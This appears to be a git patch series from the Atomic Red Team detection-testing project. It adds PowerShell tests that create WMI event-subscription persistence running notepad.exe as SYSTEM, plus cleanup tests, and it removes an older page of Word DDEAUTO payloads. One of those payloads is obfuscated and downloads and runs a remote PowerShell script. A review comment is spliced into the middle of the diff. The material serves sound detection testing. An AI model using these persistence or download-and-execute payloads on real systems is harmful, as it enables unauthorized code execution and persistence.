From 71a98582f19c2aa1826a516af5e24dd2fad5c51b Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Fri, 25 May 2018 11:06:32 -0400
Subject: [PATCH 1/2] T1084 COMPLETD FOR THE YAML GODS
---
.../Persistence/Office_Application_Startup.md | 28 --------
...ment_Instrumentation_Event_Subscription.md | 53 ---------------
atomics/T1084/T1084.yaml | 64 +++++++++++++++++++
3 files changed, 64 insertions(+), 81 deletions(-)
delete mode 100644 Windows/Persistence/Office_Application_Startup.md
delete mode 100644 Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md
create mode 100644 atomics/T1084/T1084.yaml
diff --git a/Windows/Persistence/Office_Application_Startup.md b/Windows/Persistence/Office_Application_Startup.md
deleted file mode 100644
index 3cba413f..00000000
--- a/Windows/Persistence/Office_Application_Startup.md
+++ /dev/null
@@ -1,28 +0,0 @@ -# Office Application Startup - -MITRE ATT&CK Technique: [T1137](https://attack.mitre.org/wiki/Technique/T1137) - - -## DDEAUTO - -1. Open Word -2. Insert tab -> Quick Parts -> Field -3. Choose = (Formula) and click ok. -4. Once the field is inserted, you should now see "!Unexpected End of Formula" -5. Right-click the Field, choose "Toggle Field Codes" -6. Paste in the code from Unicorn or SensePost -7. Save the Word document. - -* [SensePost DDEAUTO](https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/) - - DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" - -* [TrustedSec - Unicorn](https://github.com/trustedsec/unicorn) - -Generate the payload and download.ps1 following the Unicorn instructions, or to make one "just work", follow the steps below. - - DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http:///download.ps1'); # " "Microsoft Document Security Add-On" - -## Word VBA Macro - -[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail) diff --git a/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md b/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md deleted file mode 100644 index 291dd18f..00000000 --- a/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md +++ /dev/null 
@@ -1,53 +0,0 @@ -## Windows Management Instrumentation Event Subscription - -MITRE ATT&CK Technique: [T1084](https://attack.mitre.org/wiki/Technique/T1084) - -### Persistence - -Example: -```powershell -#Run from an administrator powershell window -#Code references -#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af -#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 - -$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - EventNameSpace='root\CimV2'; - QueryLanguage="WQL"; - Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; -$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs - -$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} -$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs - -$FilterToConsumerArgs = @{ -Filter = [Ref] $Filter; -Consumer = [Ref] $Consumer; -} -$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs -``` - -After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. 
- - -Cleanup: -```powershell -#Run from an administrator powershell window -#Code references -#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af -#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 - -$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" -$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" -$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" - -$FilterConsumerBindingToCleanup | Remove-WmiObject -$EventConsumerToCleanup | Remove-WmiObject -$EventFilterToCleanup | Remove-WmiObject -``` - -#### References - -https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af -https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
diff --git a/atomics/T1084/T1084.yaml b/atomics/T1084/T1084.yaml
new file mode 100644
index 00000000..0b24f0fc
--- /dev/null
+++ b/atomics/T1084/T1084.yaml
@@ -0,0 +1,64 @@
+---
+attack_technique: T1084
+display_name: Windows Management Instrumentation Event Subscription
+
+atomic_tests:
+- name: Persistence
+ description: |
+ Run from an administrator powershell window
+
+ After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+
+ Code references
+
+ https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
+
+ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: powershell
+ command: |
+
+ $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+ EventNameSpace='root\CimV2';
+ QueryLanguage="WQL";
+ Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
+ $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
+
+ $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+ CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
+ $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
+
+ $FilterToConsumerArgs = @{
+ Filter = [Ref] $Filter;
+ Consumer = [Ref] $Consumer;
+ }
+ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
+
+- name: Persistence Cleanup
+ description: |
+ Run from an administrator powershell window
+
+ Code references
+
+ https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
+
+ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: powershell
+ command: |
+
+ $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
+ $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
+ $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
+
+ $FilterConsumerBindingToCleanup | Remove-WmiObject
+ $EventConsumerToCleanup | Remove-WmiObject
+ $EventFilterToCleanup | Remove-WmiObject
From bc6b72b8e44e30260ee66f521a117f834938d5f2 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Fri, 25 May 2018 15:06:46 +0000
Subject: [PATCH 2/2] Generate docs from job=validate_atomics_generate_docs branch=T1084
---
atomics/T1084/T1084.md | 79 +++++++++++++++++++
atomics/index.md | 4 +-
atomics/matrix.md | 2 +-
atomics/windows-index.md | 4 +-
atomics/windows-matrix.md | 2 +-
5 files changed, 87 insertions(+), 4 deletions(-)
create mode 100644 atomics/T1084/T1084.md
diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md
new file mode 100644
index 00000000..e46c4146
--- /dev/null
+++ b/atomics/T1084/T1084.md
@@ -0,0 +1,79 @@
+# T1084 - Windows Management Instrumentation Event Subscription
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1084)
+
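Review bot: The cleanup test's `REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)}` query has no guard for the consumer lookup returning nothing, so running Atomic Test #2 on a host where Test #1 was never run (or was already cleaned) interpolates an empty `{}` into the WQL and Get-WmiObject most likely fails with an invalid-query error instead of reporting that there is nothing to remove; wrap the binding lookup and the three Remove-WmiObject calls in `if ($EventConsumerToCleanup) { ... }` or check the lookups against `$null` first. The description of Test #1 should also state what telemetry a defender is expected to observe — a new `__EventFilter`, `CommandLineEventConsumer` and `__FilterToConsumerBinding` in `root/subscription` named `AtomicRedTeam-WMIPersistence-Example`, visible to Sysinternals Autoruns and to Sysmon's WMI event IDs 19–21 — since validating that detection is the purpose of the atomic. Because the cleanup is a separate test rather than attached to the persistence test, a runner that executes only Test #1 leaves a SYSTEM-level persistence mechanism on the host until someone runs Test #2; if the YAML schema in use supports a per-test cleanup command, moving the cleanup there would close that gap.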
Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts. (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)
+
+Detection: Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns)
+
+Platforms: Windows
+
+Data Sources: WMI Objects
+
+Permissions Required: Administrator, SYSTEM
+
+## Atomic Tests
+
+- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
+
+- [Atomic Test #2 - Persistence Cleanup](#atomic-test-2---persistence-cleanup)
+
+
+
+
+## Atomic Test #1 - Persistence
+Run from an administrator powershell window
+
+After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+
+Code references
+
+https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
+
+https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+ EventNameSpace='root\CimV2';
+ QueryLanguage="WQL";
+ Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
+$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
+
+$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+ CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
+$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
+
+$FilterToConsumerArgs = @{
+Filter = [Ref] $Filter;
+Consumer = [Ref] $Consumer;
+}
+$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
+```
+
+
+
+## Atomic Test #2 - Persistence Cleanup
+Run from an administrator powershell window
+
+Code references
+
+https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
+
+https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
+$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
+$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
+
+$FilterConsumerBindingToCleanup | Remove-WmiObject
+$EventConsumerToCleanup | Remove-WmiObject
+$EventFilterToCleanup | Remove-WmiObject
+```
+
diff --git a/atomics/index.md b/atomics/index.md index 717cf275..8d23bb19 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -82,7 +82,9 @@ - [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) -- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) +- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) + - Atomic Test #1: Persistence [windows] + - Atomic Test #2: Persistence Cleanup [windows] - [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) # defense-evasion diff --git a/atomics/matrix.md b/atomics/matrix.md index 4890a3d5..c8749882 100644 --- a/atomics/matrix.md +++ b/atomics/matrix.md 
@@ -55,7 +55,7 @@ | | | [Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | | | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Software Packing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | -| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | +| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | | | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Timestomp](./T1099/T1099.md) | | | | | | | | | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | | | | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 94ca2467..1c240798 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md 
@@ -182,7 +182,9 @@ - [T1209 Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) -- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) +- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) + - Atomic Test #1: Persistence [windows] + - Atomic Test #2: Persistence Cleanup [windows] - [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) # discovery diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md index 8164f2bf..99183780 100644 --- a/atomics/windows-matrix.md +++ b/atomics/windows-matrix.md 
@@ -40,7 +40,7 @@ | | | [Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvr32](./T1117/T1117.md) | | | | | | | | | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | -| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rundll32](./T1085/T1085.md) | | | | | | | +| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Rundll32](./T1085/T1085.md) | | | | | | | | | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | | | | | | [Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | | | | | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |